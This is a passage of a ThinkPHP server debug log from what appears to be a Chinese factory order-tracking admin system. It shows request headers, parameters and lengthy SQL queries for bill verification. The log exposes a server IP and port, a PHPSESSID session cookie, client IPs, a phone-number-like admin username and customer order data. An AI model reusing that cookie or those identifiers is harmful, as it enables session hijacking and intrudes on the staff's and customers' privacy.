outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE `outboundandorder`.`verify_status` = 0 AND ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC LIMIT 0,10 [ RunTime:0.021446s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11828 [ RunTime:0.014898s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11827 [ RunTime:0.013655s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11826 [ RunTime:0.013815s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11825 [ RunTime:0.014629s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11824 [ RunTime:0.014406s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11823 [ RunTime:0.014455s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11822 [ RunTime:0.014000s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11821 [ RunTime:0.014659s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11820 [ RunTime:0.014930s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11819 [ RunTime:0.014999s ] --------------------------------------------------------------- [ 2025-12-14T16:52:47+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/hedui/ids/11828?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11828?dialog=1 [运行时间:0.079250s][吞吐率:12.62req/s] [内存消耗:6,274.60kb] [文件加载:89] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001148s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'ids' => '11828', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001474s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/verifybill/hedui.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'shoukuanStatusList', 8 => 'start_time', 9 => 'end_time', 10 => 'total', 11 => 'outbound', 12 => 'rows', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000120s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000464s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000759s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000416s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000579s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001269s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000732s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000325s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000734s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000906s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000722s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000929s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000708s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '11828' [ RunTime:0.015485s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1513 LIMIT 1 [ RunTime:0.000571s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 944 LIMIT 1 [ RunTime:0.000327s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 2762 LIMIT 1 [ RunTime:0.000273s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 2763 LIMIT 1 [ RunTime:0.000272s ] [ sql ] [ SQL ] SELECT * FROM `ot_outbound` WHERE `id` = 11828 LIMIT 1 [ RunTime:0.000275s ] --------------------------------------------------------------- [ 2025-12-14T16:52:47+08:00 ] 106.112.204.117 GET /admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765702367 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765702367 [运行时间:0.034725s][吞吐率:28.80req/s] [内存消耗:3,850.14kb] [文件加载:71] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001484s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11828?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.verifybill', 'v' => '1765702367', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001825s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000099s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:52:48+08:00 ] 106.112.204.117 POST /admin/staffmge/kehu/getfackehu [ info ] 47.105.33.115:8081/admin/staffmge/kehu/getfackehu [运行时间:0.051079s][吞吐率:19.58req/s] [内存消耗:5,010.32kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001200s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.kehu', 2 => 'getfackehu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '158', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11828?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'searchTable' => 'tbl', 'searchKey' => 'id', 'searchValue' => '360', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'showField' => 'name', 'keyField' => 'id', 'keyValue' => '360', 'searchField' => array ( 0 => 'name', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001966s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/kehu.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Kehu->getfackehu[ /alidata/www/gendan/application/admin/controller/staffmge/Kehu.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.006393s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000489s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000849s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_kehu` WHERE `id` IN (360) AND ( factorymge_id =40 ) LIMIT 1 [ RunTime:0.000340s ] [ sql ] [ SQL ] SELECT * FROM `ot_kehu` WHERE `id` IN (360) AND ( factorymge_id =40 ) ORDER BY `name` ASC LIMIT 0,20 [ RunTime:0.000316s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000611s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"searchTable\":\"tbl\",\"searchKey\":\"id\",\"searchValue\":\"360\",\"orderBy\":[[\"name\",\"ASC\"]],\"showField\":\"name\",\"keyField\":\"id\",\"keyValue\":\"360\",\"searchField\":[\"name\"]}' , '/admin/staffmge/kehu/getfackehu' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765702368) [ RunTime:0.004698s ] --------------------------------------------------------------- [ 2025-12-14T16:53:16+08:00 ] 3.138.185.30 GET / [ info ] clcoa.com/ [运行时间:0.029078s][吞吐率:34.39req/s] [内存消耗:3,333.17kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001233s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001582s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000102s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:53:53+08:00 ] 106.112.204.117 POST /admin/financial/verifybill/hedui/ids/11828?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11828?dialog=1 [运行时间:0.178169s][吞吐率:5.61req/s] [内存消耗:6,223.20kb] [文件加载:94] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001118s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '601', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11828?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'kehu_id' => array ( 0 => '中伟', 1 => '360', ), 'verify_amount' => array ( 0 => '200', 1 => '200', 2 => '3', 3 => '3', ), 'price' => array ( 0 => '7.52', 1 => '1.6800000000', 2 => '16.7', 3 => '2.3000000000', ), 'money' => array ( 0 => '1504', 1 => '336.0000000000', 2 => '50.099999999999994', 3 => '6.9000000000', ), 'explain' => array ( 0 => '320W-17底壳200个', 1 => '320w-1上盖200个', 2 => '2000W底壳3个', 3 => '2000W盖3个', ), 'shoukuan_status-1' => '1', 'shoukuan_status-2' => '1', 'shoukuan_status-3' => '1', 'shoukuan_status-4' => '1', 'ids' => '11828', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001460s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.006856s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000404s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000745s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000586s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000614s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001019s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000694s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000450s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000832s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000919s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000779s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000682s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000735s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON 